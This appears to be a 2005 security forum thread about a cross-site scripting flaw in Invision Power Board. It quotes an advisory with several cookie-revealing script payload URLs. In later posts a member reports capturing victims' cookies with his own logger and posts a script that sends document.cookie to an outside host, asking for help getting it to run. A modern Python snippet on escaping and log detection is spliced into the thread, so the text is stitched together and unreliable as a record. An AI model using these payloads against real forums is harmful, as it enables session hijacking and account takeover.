Invision XSS Reveals Cookie And Session Details

#1 Kenny
  • Commander In Chief
  • Group: Admin
  • Posts: 6,446
  • Joined: 18-August 06

Posted 02 May 2005 - 04:51 AM

BTW, my name is not Arron Ward.... it's an alias account.

Quote

Invision Power Board URL Parameter Input Validation Error Lets Remote Users Conduct Cross-Site Scripting Attacks

SecurityTracker alert ID: 1013863
SecurityTracker URL: http://securitytracker.com/id?1013863
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 2 2005

Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information

Exploit Included: Yes 

Version(s): 2.0.3, 2.1 Alpha 2

Description: Arron Ward from GovernmentSecurity.org reported an input validation vulnerability in Invision Power Board. A remote user can conduct cross-site scripting attacks.

The forum software does not properly validate user-supplied input in certain URL parameters. A remote user can create a specially crafted URL that, when loaded by an authenticated target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Invision Power Board software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/index.php?act='><script>alert(document.cookie)</script>

Internet Explorer users are affected. Some other browsers do not execute the resulting HTML.

Other parameters are also affected.

Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Invision Power Board software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution: No solution was available at the time of this entry.

Vendor URL: www.invisionboard.com/

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: "arron ward" <deadlink@elitemail.org>

Message History: None.

Source Message Contents

==================================

Invision Xss reveals Cookie and session details

By adding = and a script input on any page, you can reveal the logged-in user's
cookie and session details, including hashes... details below.

Note: you must be a member for this to work!!

Vendor: http://www.invisionboard.com/

Notified = Yes

29/4/2005

Tested on

IPB 2.0.3
IPB 2.1 Alpha 2

Not tested on other versions, but I expect they will be vuln also.


Tested this on the IPB main website forum and it is fully working.

Also notified IPB Admin via Private Message.

Details:

Here are the scripts. This will work on various pages, for instance, using
IE.

Example visit:

http://forums.invisi...m/index.php?act

Now by adding an equals = and a script message, in this case to reveal
cookies and session path details including the user hash...

='><script>alert(document.cookie)</script>

So the full XSS URL is:

http://forums.invisi...hp?...</script>

Again, this will work on multiple URLs... examples follow:

/forum/index.php?act=Members='><script>alert(document.cookie)</script>
/forum/index.php?act='><script>alert(document.cookie)</script>
/forum/index.php?act=calendar='><script>alert(document.cookie)</script>
/forum/index.php?act=Help&CODE=01&HID='><script>alert(document.cookie)</script>

and so on...

regards

ComSec

co/Admin

http://www.governmen...urity.org/forum
--


FIX: upgrade to 2.0.4

Attached File(s): 11.jpg (108.51K)

Kenny aka ComSec

Please read the Forum Rules !!!

Blog

" http://kaltech.blogspot.com/ "

______________________
0
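As an added illustration (not code from the advisory, the forum, or Invision Power Board), the reflection bug the SecurityTracker entry describes: the `act` value dropped unencoded into a single-quoted attribute, the same template with output encoding, and a small check over constructed access-log lines for the advisory's payload. The hidden-input template, the log format, and the IP addresses are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed copy of the payload quoted in the advisory above.
ADVISORY_PAYLOAD = "'><script>alert(document.cookie)</script>"


def render_act_vulnerable(act: str) -> str:
    """Reflect ?act= into a single-quoted attribute with no encoding (assumed
    template). A value starting with '> closes the attribute and the tag, so
    the rest is parsed as markup by the victim's browser."""
    return f"<input type='hidden' name='act' value='{act}'>"


def render_act_fixed(act: str) -> str:
    """Same template, but quote=True turns ' " < > & into entities, so the
    value can no longer leave the attribute it was placed in."""
    return f"<input type='hidden' name='act' value='{html.escape(act, quote=True)}'>"


def contains_live_script_tag(markup: str) -> bool:
    """Crude check: does an actual <script> element survive in the output?"""
    return re.search(r"<script\b", markup, re.IGNORECASE) is not None


# Detection side. Constructed sample access-log lines, not real traffic;
# the second and third carry the advisory's payload URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/May/2005:04:51:00 +0000] "GET /index.php?act=Members HTTP/1.1" 200 5120',
    '10.0.0.6 - - [02/May/2005:04:52:10 +0000] "GET /index.php?act=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5120',
    '10.0.0.7 - - [02/May/2005:04:53:30 +0000] "GET /index.php?act=Help&CODE=01&HID=%27%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120',
]

# Tag openers or a javascript: URL in a decoded parameter value.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:", re.IGNORECASE)
REQUEST_RE = re.compile(r'^(\S+) .*"GET (\S+) HTTP')


def suspicious_requests(log_lines):
    """Return (client_ip, parameter_name) for every query parameter whose
    percent-decoded value looks like HTML markup."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        ip, path = m.group(1), m.group(2)
        params = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for name, values in params.items():   # parse_qs already URL-decodes
            if any(MARKUP_RE.search(v) for v in values):
                hits.append((ip, name))
    return hits
```

The `act=Help&CODE=01&HID=...` case shows why every parameter, not just `act`, has to be checked, matching the advisory's note that other parameters are affected.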

#2 Kenny
  • Commander In Chief
  • Group: Admin
  • Posts: 6,446
  • Joined: 18-August 06

Posted 02 May 2005 - 08:43 AM

It appears IPB have deleted or moved the thread to a private part of their forum after I posted it there and it was confirmed by existing forum owners...

They did not have the decency to inform me via PM that they removed it.... if you ask me, that's downright ignorance....

Thanks V for the PM at IPB :)

#3 KarachiKing555
  • Private First Class
  • Group: Members
  • Posts: 103
  • Joined: 09-October 03

Posted 04 May 2005 - 07:52 PM

@comsec
Can you please help and give a little idea over here regarding the cookie vuln, Remote User?

#4 Kenny
  • Commander In Chief
  • Group: Admin
  • Posts: 6,446
  • Joined: 18-August 06

Posted 04 May 2005 - 10:58 PM

Well, you could create a link that... if a member clicks the link... it then sends his details to your site and a specific file.

I'm not being funny when I say Google.

Search for.... cookie stealing and php cookie stealing... there are various methods depending on what your setup is... so I could be here all day trying to sort out one method.... there are plenty of papers and hints... so try them ;)

#5 Blake
  • Former Commander In Chief
  • Group: Retired General
  • Posts: 7,317
  • Joined: 24-September 02

Posted 05 May 2005 - 12:14 AM

I am a bit annoyed with IPB at the moment. The reason why IPB was first chosen for this forum was because of the responsiveness and the speed at which patches were released. I hope they begin to start increasing their customer service. Perhaps the vulnerabilities that are found should be released onto the major lists as a motivation factor.

#6 Kenny
  • Commander In Chief
  • Group: Admin
  • Posts: 6,446
  • Joined: 18-August 06

Posted 05 May 2005 - 01:07 AM

Hence Gsecur... that is why I have not informed them about the other XSS I found in Invision Gallery.... they are, as far as I'm concerned, ignorant... to not even say hey.. "thanks for letting us know we have a problem", they just release a patch to upgrade to 2.0.4.

Bollocks to them in future.... any more I find from now on will get released without notice.... including one I'm working on for Admin Access, and I'm not far away from getting it to work.

#7 Warlord_David
  • Corporal
  • Group: Members
  • Posts: 154
  • Joined: 16-December 03

Posted 05 May 2005 - 01:23 AM

Ha, I remember something else like this, nothing to do with IPB though. It was an .exe that installed a backdoor; after it was installed it sent the IP address with user/pass information and the port to a webserver you had to make (the program came with all the files).

#8 KarachiKing555
  • Private First Class
  • Group: Members
  • Posts: 103
  • Joined: 09-October 03

Posted 05 May 2005 - 02:10 AM

Thx Comsec!! It was right there on Google! I was searching for SQL injection and all that stuff!! I successfully got the cookies @ my new logger!! But I have a little problem here!

The XSS vuln which successfully gave me the cookies alert:
[color=img srchttpaaaaaaaajpg border0 altuser posted image ]`style=background:url("javascript:alert(unescape(document.cookie));") [/color]


And I wanna inject this:

<script>window.document.location='http://somesite.hostedat.com/root/log.php?cookie='+window.document.cookie;</script>



I tried this but no luck :(

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:window.document.location('http://somesite.hostedat.com/root/log.php?cookie='+window.document.cookie');") [/COLOR]


Any idea how this could work? :unsure: Thanx again for all your help!

KarachiKing555

This post has been edited by KarachiKing555: 05 May 2005 - 08:37 AM

#9 Axl
  • Sergeant First Class
  • Group: Specialist
  • Posts: 338
  • Joined: 13-December 03

Posted 05 May 2005 - 02:14 AM

h3h3h3h3 =]
comsec...do you hear bells ringing ??

KarachiKing555:
this exploit works
but not on gso
not anymore that is.... :lol:

#10 KarachiKing555
  • Private First Class
  • Group: Members
  • Posts: 103
  • Joined: 09-October 03

Posted 05 May 2005 - 02:36 AM

@AXL
This XSS will not even work on IPB 1.3, I think! I'm testing this on 1.2 ;)!! Just trying to learn this stuff b4 messing with current versions and all :rolleyes:

#11 Axl
  • Sergeant First Class
  • Group: Specialist
  • Posts: 338
  • Joined: 13-December 03

Posted 05 May 2005 - 03:00 AM

Yes, it does work.
I tested it successfully on gso about a week ago!
But because gso was not patched then, and due to comsec's request, I kept my mouth shut :blink:

Anyway...
it works!

#12 KarachiKing555
  • Private First Class
  • Group: Members
  • Posts: 103
  • Joined: 09-October 03

Posted 05 May 2005 - 08:27 AM

hmmmmm

#13 Kenny
  • Commander In Chief
  • Group: Admin
  • Posts: 6,446
  • Joined: 18-August 06

Posted 05 May 2005 - 11:04 AM

Yes, it did work... our problem was... we had just moved servers and transferred everything but never got around to applying the patches... till Axl noticed while he was in one of his snooping moods... fair play to him.. he informed us on the spot... like all good guys do, and we patched them... well, Gsecur did... after I hassled him as usual ;)